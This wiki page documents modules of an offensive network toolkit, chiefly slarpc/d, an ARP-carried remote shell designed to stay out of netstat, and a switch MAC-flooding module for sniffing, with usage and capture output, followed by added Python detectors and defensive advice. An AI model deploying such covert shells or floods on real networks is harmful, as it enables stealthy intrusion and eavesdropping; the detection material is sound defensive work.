bryan alexander edited this page Jul 29, 2014 · 1 revision

These modules perform parameter cracking to gain access to a network. Access point (AP) cracking is delegated to Wifite. Included are WEP Crack, WPA2 Crack, WPS Crack, Router pwn, slarpc/d, and switch over.

slarpc is a remote shell that works over the ARP protocol. Traffic can optionally be encrypted with RC4 under a shared key. The slarpd daemon must be started on the remote host before use, and it runs silently in the background. Because it does not bind to a port, it does not appear in netstat output:

root@127:~# python slarpd.py
usage: slarpd.py [-h] [-r REMOTE] [-P] [-a NET] [-k]

optional arguments:
  -h, --help  show this help message and exit
  -r REMOTE   remote address
  -P          encryption flag
  -a NET      network adapter
  -k          kill a running daemon
root@127:~# python slarpd.py -r 192.168.1.42 -P
[!] Encryption password: 
daemon running with adapter eth0, going into hibernate mode...
root@127:~# netstat -vantp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:8182          0.0.0.0:*               LISTEN      1541/firefox    
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      1014/postgres.bin
tcp6       0      0 ::1:7337                :::*                    LISTEN      1014/postgres.bin
root@127:~# 

On the client side:

> 5 3
[!] The slarpd daemon should be running on the remote host!
[!] Remote host: 192.168.1.74
[!] Encrypt traffic?  
[!] Enter encryption password: 
[!] Traffic encrypted.
[!] Spawning remote shell to 192.168.1.74
# whoami
root
# uname -a
Linux 127.0.0.1 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
# 

Because a shared key is used, you can connect at any time without maintaining a session. Typing "slarp-shutdown" silently kills the remote daemon. Since slarpd runs in userland, the kernel answers each ARP request as well, so the exchange produces more ARP packets than normal when viewed in Wireshark or tcpdump. Running tcpdump:

root@127:~# tcpdump "arp"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
17:39:14.898393 ARP, Request who-has 127 tell 192.168.1.42, length 46
17:39:14.898430 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28
17:39:14.916212 ARP, Request who-has 127 tell 192.168.1.42, length 46
17:39:14.916234 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28
17:39:14.920415 ARP, Request who-has www.asusnetwork.net tell 127, length 28
17:39:14.920918 ARP, Reply www.asusnetwork.net is-at f4:6d:04:5f:2c:46 (oui Unknown), length 50
17:39:14.922837 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 36
17:39:24.916784 ARP, Request who-has 127 tell www.asusnetwork.net, length 50
17:39:24.916807 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28

And with a more verbose flag:

root@127:~# tcpdump -A "arp"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
17:40:54.113494 ARP, Request who-has 127 tell 192.168.1.42, length 46
..........'-zm...*.........JO8u+RC4+cw==......
17:40:54.113533 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 28
..........'|.....J..'-zm...*
17:40:54.121894 ARP, Reply 127 is-at 08:00:27:7c:98:d0 (oui Unknown), length 36
..........'|.....J..'-zm...*eNO5Xw==

Although the command itself is encrypted, any proactive administrator sniffing the network will notice the extra data appended to each ARP packet.
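The two tells described above (a trailer after the 28-byte ARP header, and the kernel and the daemon both answering the same request with replies of different lengths) can be checked mechanically. The following detector is an added example written for this page, not code from zarp or slarpc/d: it parses raw Ethernet/ARP frames, treats trailing zero bytes as ordinary minimum-frame padding, and flags any other bytes after the ARP header. The sample frames are constructed here; the MAC 08:00:27:7c:98:d0, the addresses 192.168.1.42 and 192.168.1.74, and the base64 trailers come from the capture above, while the client MAC is made up.

```python
import struct
from dataclasses import dataclass

ETH_HDR_LEN = 14
ETHERTYPE_ARP = 0x0806
MIN_ETH_FRAME = 60      # minimum Ethernet frame (without FCS); short ARP frames are zero-padded to it
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def build_arp(src_mac, dst_mac, op, sender_mac, sender_ip, target_mac, target_ip, trailer=b"", pad=False):
    """Constructed Ethernet/ARP frame used only to build the sample capture below."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)       # Ethernet / IPv4 / hlen 6 / plen 4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    frame = eth + arp + trailer
    return frame.ljust(MIN_ETH_FRAME, b"\x00") if pad else frame


@dataclass
class ArpFinding:
    src_mac: str
    sender_ip: str
    opcode: int
    arp_len: int        # bytes after the Ethernet header, the "length" tcpdump prints
    trailer: bytes      # non-padding bytes found after the ARP header


def inspect_arp_frame(frame):
    """Parse one frame; return an ArpFinding, or None if it is not a well-formed ARP frame."""
    if len(frame) < ETH_HDR_LEN + 8:
        return None
    _dst, src, ethertype = struct.unpack("!6s6sH", frame[:ETH_HDR_LEN])
    if ethertype != ETHERTYPE_ARP:
        return None
    arp = frame[ETH_HDR_LEN:]
    _htype, _ptype, hlen, plen, op = struct.unpack("!HHBBH", arp[:8])
    hdr_len = 8 + 2 * hlen + 2 * plen                      # 28 bytes for Ethernet/IPv4
    if len(arp) < hdr_len:
        return None
    sender_ip = ".".join(str(b) for b in arp[8 + hlen:8 + hlen + plen])
    # Legitimate short frames are padded with zeros; anything else after the header is foreign data.
    trailer = arp[hdr_len:].rstrip(b"\x00")
    return ArpFinding(mac_str(src), sender_ip, op, len(arp), trailer)


def find_arp_trailers(frames):
    """ARP frames carrying non-zero data after the ARP header."""
    return [f for f in map(inspect_arp_frame, frames) if f and f.trailer]


def find_duplicate_replies(frames):
    """(mac, ip) pairs that sent replies of differing lengths: two responders (kernel and
    userland daemon) answering for the same address."""
    lengths = {}
    for f in map(inspect_arp_frame, frames):
        if f and f.opcode == ARP_REPLY:
            lengths.setdefault((f.src_mac, f.sender_ip), set()).add(f.arp_len)
    return sorted(k for k, v in lengths.items() if len(v) > 1)


# Constructed sample capture: client 192.168.1.42 talks to the daemon host 192.168.1.74.
CLIENT_MAC, CLIENT_IP = "08:00:27:aa:bb:cc", "192.168.1.42"     # client MAC is made up
HOST_MAC, HOST_IP = "08:00:27:7c:98:d0", "192.168.1.74"
BCAST, ZERO = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"

SAMPLE_FRAMES = [
    # ordinary request, zero-padded to 60 bytes (shows as ARP length 46)
    build_arp(CLIENT_MAC, BCAST, ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO, HOST_IP, pad=True),
    # request from slarpc with a base64 command appended, then padded
    build_arp(CLIENT_MAC, BCAST, ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO, HOST_IP,
              trailer=b"JO8u+RC4+cw==", pad=True),
    # the kernel's own reply: exactly 28 bytes of ARP
    build_arp(HOST_MAC, CLIENT_MAC, ARP_REPLY, HOST_MAC, HOST_IP, CLIENT_MAC, CLIENT_IP),
    # the daemon's reply with output appended (length 36)
    build_arp(HOST_MAC, CLIENT_MAC, ARP_REPLY, HOST_MAC, HOST_IP, CLIENT_MAC, CLIENT_IP,
              trailer=b"eNO5Xw=="),
]

if __name__ == "__main__":
    for f in find_arp_trailers(SAMPLE_FRAMES):
        print(f"trailer from {f.src_mac} ({f.sender_ip}), arp_len={f.arp_len}: {f.trailer!r}")
    print("duplicate responders:", find_duplicate_replies(SAMPLE_FRAMES))
```

The same check can be run on live traffic by feeding it frames from a raw socket or a pcap reader; the only assumption is that padding is zero-filled, which holds for the Linux and BSD stacks. On the host side, a userland responder that uses a packet socket is absent from `netstat -t` but is listed by `ss -0 -p` (packet sockets with owning process), which is the inventory a defender should compare against the process list.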

Switch over is a module that floods a switch with spoofed ARP packets carrying randomized source MAC addresses. This should eventually fill up the switch's MAC address table, and the switch will hopefully fail over to hub-like behaviour, allowing you to sniff all the traffic.
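What makes this flood visible from the monitoring side is the rate of distinct source MACs on one port or mirrored interface. The sliding-window counter below is an added example written for this page, not code from zarp: it takes time-ordered (timestamp, source MAC) events and raises one alert whenever the number of distinct source addresses seen in the last window exceeds a threshold. The event stream is constructed here (five normal hosts, then a burst of random addresses) and the threshold of 32 is an assumed value for an access port with a handful of hosts.

```python
import random
from collections import deque


def detect_mac_flood(events, window_s, threshold):
    """events: iterable of (timestamp_seconds, src_mac) in time order for one port.
    Returns [(timestamp, distinct_count)] with one entry per excursion above threshold."""
    alerts = []
    window = deque()        # (ts, mac) pairs inside the current window
    counts = {}             # mac -> occurrences inside the window
    above = False
    for ts, mac in events:
        window.append((ts, mac))
        counts[mac] = counts.get(mac, 0) + 1
        # drop events that have fallen out of the window
        while window and window[0][0] < ts - window_s:
            _old_ts, old_mac = window.popleft()
            counts[old_mac] -= 1
            if counts[old_mac] == 0:
                del counts[old_mac]
        distinct = len(counts)
        if distinct > threshold and not above:
            alerts.append((ts, distinct))
            above = True
        elif distinct <= threshold:
            above = False
    return alerts


def sample_events():
    """Constructed event stream: 10 s of normal chatter from five hosts, then a burst of
    200 frames with random source MACs inside one second (the traffic a CAM flood produces)."""
    rng = random.Random(1)          # fixed seed so the sample is reproducible
    normal = [f"08:00:27:00:00:{i:02x}" for i in range(5)]
    events = [(i * 0.5, normal[i % 5]) for i in range(20)]
    for i in range(200):
        mac = ":".join(f"{rng.randrange(256):02x}" for _ in range(6))
        events.append((10.0 + i * 0.005, mac))
    return events


if __name__ == "__main__":
    for ts, n in detect_mac_flood(sample_events(), window_s=1.0, threshold=32):
        print(f"t={ts:.3f}s: {n} distinct source MACs in the last second")
```

A switch-side control for the same condition is port security, which caps the number of MAC addresses a port may learn and shuts the port or drops frames when the cap is exceeded; a distinct-source count well above the expected host population on an access port is the same signal expressed as a monitoring rule.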
